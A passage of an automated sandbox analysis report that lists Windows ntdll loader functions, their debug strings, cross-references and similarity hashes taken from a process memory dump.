                                          • RtlDebugPrintTimes.NTDLL ref: 21AD656C
                                            • Part of subcall function 21AD65B5: RtlDebugPrintTimes.NTDLL ref: 21AD6664
                                            • Part of subcall function 21AD65B5: RtlDebugPrintTimes.NTDLL ref: 21AD66AF
                                          Strings
                                          • LdrpInitShimEngine, xrefs: 21B399F4, 21B39A07, 21B39A30
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 21B39A01
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 21B39A2A
                                          • apphelp.dll, xrefs: 21AD6496
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 21B399ED
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B39A11, 21B39A3A
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          • Opcode ID: 4ca5fc8a3cee87b7381296903f5c8df7be0f0a1e1a849e5b33de946a83f2fa98
                                          • Instruction ID: 788df217573ceaf89b7297738c87843b170c882c23c697fb7ee568a245fc95c7
                                          • Opcode Fuzzy Hash: 4ca5fc8a3cee87b7381296903f5c8df7be0f0a1e1a849e5b33de946a83f2fa98
                                          • Instruction Fuzzy Hash: FE519E722487059FE719CF28C990E9B77F8FF88744F400A1EF99997161DA30E945CB92
                                          Strings
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 21B68A67
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 21B68A3D
                                          • VerifierDebug, xrefs: 21B68CA5
                                          • HandleTraces, xrefs: 21B68C8F
                                          • AVRF: -*- final list of providers -*- , xrefs: 21B68B8F
                                          • VerifierFlags, xrefs: 21B68C50
                                          • VerifierDlls, xrefs: 21B68CBD
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 4377becd9d34a479d33220f12555879c2b0dfa9f578b8ae62a6f3fcfbc5f3abb
                                          • Instruction ID: 628d1f5e98ba48e39af45732ee0f8befeae628cfc1ae1b78708b394e2cd50334
                                          • Opcode Fuzzy Hash: 4377becd9d34a479d33220f12555879c2b0dfa9f578b8ae62a6f3fcfbc5f3abb
                                          • Instruction Fuzzy Hash: 8B91ED72645796AFDB1ECF688890B0A7BBCEF79710F05056CFA44AB254C7349804CBA6
                                          Strings
                                          • LdrpDynamicShimModule, xrefs: 21B4A998
                                          • apphelp.dll, xrefs: 21B02462
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 21B4A992
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B4A9A2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: 7f0f9b76d44df74d95adc54a104249e6c781fd2d29165a9ed08cb007ddd2736f
                                          • Instruction ID: f46d9f40bbf1d69c0c5f03238abe60fd148bd587658d99efe076115b620d3276
                                          • Opcode Fuzzy Hash: 7f0f9b76d44df74d95adc54a104249e6c781fd2d29165a9ed08cb007ddd2736f
                                          • Instruction Fuzzy Hash: 5B314B76E40202EBD71DDF79C9A1E6EBBB8FF86B00F16405AF90167261C7745941EB80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                          • API String ID: 0-1109411897
                                          • Opcode ID: 96b88e935b24fc3a201ddb8cc41a55e33c8208d6e1c7b7fb8ee0f265aab2d6e8
                                          • Instruction ID: 23c99008b011b6dd259743137e490e16df2a91ece85232bab81abf3d3a4536ff
                                          • Opcode Fuzzy Hash: 96b88e935b24fc3a201ddb8cc41a55e33c8208d6e1c7b7fb8ee0f265aab2d6e8
                                          • Instruction Fuzzy Hash: F2A23974E0562A8FDB68CF18C998B99BBB5FF45304F2482E9D50CA7290DB319E95CF00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 36d30e439c241116dd90aeba5f62e1bc23cc61b0783e54bdf66f4e557f9ab428
                                          • Instruction ID: e06db7fa9d87fedd8a11a14f2f83197807ea8969ff3cbd13963ebba370526d63
                                          • Opcode Fuzzy Hash: 36d30e439c241116dd90aeba5f62e1bc23cc61b0783e54bdf66f4e557f9ab428
                                          • Instruction Fuzzy Hash: 3E918771A40266AFEB1DCF21C890F9A7BB5FF56B64F11012DE904BB295E7B88801C7D1
                                          Strings
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 21B581E5
                                          • LdrpInitializeProcess, xrefs: 21B1C6C4
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 21B58181, 21B581F5
                                          • LdrpInitializeImportRedirection, xrefs: 21B58177, 21B581EB
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B1C6C3
                                          • Loading import redirection DLL: '%wZ', xrefs: 21B58170
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 65470ae613233acd399057cd98980822839d3674eb812316a948c0eadaecd14b
                                          • Instruction ID: 255fb7b91f96091088f014f41840f209f69a01525b4677bc5f2d6b4fc9458fb2
                                          • Opcode Fuzzy Hash: 65470ae613233acd399057cd98980822839d3674eb812316a948c0eadaecd14b
                                          • Instruction Fuzzy Hash: 7131077164474AAFC61CDF29CD85E2B7BF4EF98B10F05055CF884AB2A5E620ED04C7A2
                                          Strings
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 21B5219F
                                          • SXS: %s() passed the empty activation context, xrefs: 21B52165
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 21B52180
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 21B521BF
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 21B52178
                                          • RtlGetAssemblyStorageRoot, xrefs: 21B52160, 21B5219A, 21B521BA
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 653471ca4d486567d7294589572e7c52ea435c6d9eea9941a764eed60a75042d
                                          • Instruction ID: cfb48c275238f95939f1dbee8adbb0b5f2ad92741b87c0712948753413f934a6
                                          • Opcode Fuzzy Hash: 653471ca4d486567d7294589572e7c52ea435c6d9eea9941a764eed60a75042d
                                          • Instruction Fuzzy Hash: 1D31D43AE01115BBEB19CF97CC80F5B7B78EB65B50F120199BB04AB258D2309E01CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: fcf3c97526b4aced829dbab9fe1236df06b10c721ce35f64eb3a130f62d20750
                                          • Instruction ID: 9e4bc14805c1ebe9b75736ee33c3bd89850d5e53f78d569077354b56b69b7232
                                          • Opcode Fuzzy Hash: fcf3c97526b4aced829dbab9fe1236df06b10c721ce35f64eb3a130f62d20750
                                          • Instruction Fuzzy Hash: 08F1BB70A00A06DFEB19CF68C991F6ABBF6FF55300F1481A9E4059B391D735EA81CB90
                                          APIs
                                          Strings
                                          • Failed to allocated memory for shimmed module list, xrefs: 21B4A10F
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B4A121
                                          • LdrpCheckModule, xrefs: 21B4A117
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-161242083
                                          • Opcode ID: 2f5adf0c7f3aea0bc91be1a5e2e0e20091f6ab31cd30a1d2eac08ce01ca6b4af
                                          • Instruction ID: ed2146f5ddc066438250376a84330c7745c545a214df7f5614609f0076b874af
                                          • Opcode Fuzzy Hash: 2f5adf0c7f3aea0bc91be1a5e2e0e20091f6ab31cd30a1d2eac08ce01ca6b4af
                                          • Instruction Fuzzy Hash: 1F71C071A002069FDB1DDF68C990AAEBBF4FF49744F14802DD806E7261E735AA81DB50
                                          APIs
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 21B582D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 21B582DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B582E8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          • Opcode ID: 11dbfe4f7c77477446a2231125d31091468c83c9bb2358337e26c20d5055c052
                                          • Instruction ID: 2b0c58ffa2e86c98a2641d4a06b98a36bd7f57fb2749a7d3bd0b5d2a30df74bf
                                          • Opcode Fuzzy Hash: 11dbfe4f7c77477446a2231125d31091468c83c9bb2358337e26c20d5055c052
                                          • Instruction Fuzzy Hash: E4410FB2644305AFCB19DF75C980B8B7BF8EF59750F01492AF948D32A4EB78D9008B91
                                          APIs
                                          Strings
                                          • LdrpCheckRedirection, xrefs: 21B6488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 21B64899
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 21B64888
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          • Opcode ID: bb1728d1305b82388d6210d5b483635a952046a12e1720746ddc46eff9672fe7
                                          • Instruction ID: 3aab3a1b6c2a792f5a556986b1fee543d2d4b682567b2ea11132af5fd99fe7a8
                                          • Opcode Fuzzy Hash: bb1728d1305b82388d6210d5b483635a952046a12e1720746ddc46eff9672fe7
                                          • Instruction Fuzzy Hash: 4141BE32A05AD19FCB19CE68C940E267BFCFFAA750F02065DED4897269E734D900CB91
                                          APIs
                                            • Part of subcall function 21B22DF0: LdrInitializeThunk.NTDLL ref: 21B22DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20D74
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: c6f4c0d396b025ea81d9c1be715d654016faaf9740f406a7e7e993bf8fc626bd
                                          • Instruction ID: 334072c462caa73de4ef1a3900b04e2c0a32dd8e4b1170f1d94768a9afab15f6
                                          • Opcode Fuzzy Hash: c6f4c0d396b025ea81d9c1be715d654016faaf9740f406a7e7e993bf8fc626bd
                                          • Instruction Fuzzy Hash: 76425871900715DFDB65CF24C880BAAB7F5FF08310F0445A9E989EB245E770AA89CF61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 5704dc26ad6ac71a8e376fec52a1983fcff4335ffdda48946f71c4b8a0b43b7a
                                          • Instruction ID: 9efc9a683fb0d143f45bdf862dbf654ed8f495cb924ef0eeb247a39978bf72e6
                                          • Opcode Fuzzy Hash: 5704dc26ad6ac71a8e376fec52a1983fcff4335ffdda48946f71c4b8a0b43b7a
                                          • Instruction Fuzzy Hash: F2F1E472E006118FCB2CCF69CAA067EBFF5EF99210719416DD896DB791E634EA01CB50
                                          APIs
                                          Strings
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 21AE063D
                                          • kLsE, xrefs: 21AE0540
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          • Opcode ID: 6c1da775349f8470cbeea04a0e150612293aaa9fa61c2145ca4884d84029a684
                                          • Instruction ID: 3951b6be495efd28604264cd36c29c2837554a27209b1c88aa3747131eb0d8b6
                                          • Opcode Fuzzy Hash: 6c1da775349f8470cbeea04a0e150612293aaa9fa61c2145ca4884d84029a684
                                          • Instruction Fuzzy Hash: C2518871604B429FD315DF74C6896A7BBE4BF85300F10883EEAAE87241E7749645CFA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: dad07ccf8ac24327d19d567b6a69902b02b0876b7cd63abe4f58d58a375e71f1
                                          • Instruction ID: 6be6f88cf97821cd6b288d4f64478760c03457fabf67bd89420188ff93864aa5
                                          • Opcode Fuzzy Hash: dad07ccf8ac24327d19d567b6a69902b02b0876b7cd63abe4f58d58a375e71f1
                                          • Instruction Fuzzy Hash: 4CC179746083828FD715CF64C148B5AB7F8FF85704F04896EF99A8B252E734CA49CB66
                                          Strings
                                          • LdrpInitializeProcess, xrefs: 21B18422
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 21B1855E
                                          • @, xrefs: 21B18591
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B18421
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 0c267241b1f447b6688a322280afdba2d55c7c98f30a6d8d0d63b706f003b1f8
                                          • Instruction ID: 4e9b1f91097c2e1c606d28ceb19393a7b892cfdfae4d7589e37fd8bf3b8b50fd
                                          • Opcode Fuzzy Hash: 0c267241b1f447b6688a322280afdba2d55c7c98f30a6d8d0d63b706f003b1f8
                                          • Instruction Fuzzy Hash: F0915B71548345AFDB25CF61C980EABBAFCFF98744F40092EFA84D2155E634DA04CB62
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 21B521D9, 21B522B1
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 21B522B6
                                          • SXS: %s() passed the empty activation context, xrefs: 21B521DE
                                          • .Local, xrefs: 21B128D8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 268087637d1e1ce7afd5294a057e25840d399b7b24f7a64e660d4ebe223de3ac
                                          • Instruction ID: 4477d93f9876791ee8964a4a3b61742f3fd3d0075b35b5e1259e7098d405f564
                                          • Opcode Fuzzy Hash: 268087637d1e1ce7afd5294a057e25840d399b7b24f7a64e660d4ebe223de3ac
                                          • Instruction Fuzzy Hash: B3A1BE35D01229DFDB28CF68C884B99B7B5FF59394F2201E9D908AB265D7309E80CF90
                                          Strings
                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 21B5342A
                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 21B53437
                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 21B53456
                                          • RtlDeactivateActivationContext, xrefs: 21B53425, 21B53432, 21B53451
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                          • API String ID: 0-1245972979
                                          • Opcode ID: 72e076cd1b458681d5c997c9c5230eb46c031e84ccde559216cdc42c7a41950b
                                          • Instruction ID: 4058550d3852559871412b87b3926363134e818b8fa8b0d3795a670a25d586ef
                                          • Opcode Fuzzy Hash: 72e076cd1b458681d5c997c9c5230eb46c031e84ccde559216cdc42c7a41950b
                                          • Instruction Fuzzy Hash: B2611032600A12AFD71ACF19C891B1BBBF5EF96B50F16862DE9549B364C734E801CB91
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 21B40FE5
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 21B410AE
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 21B41028
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 21B4106B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
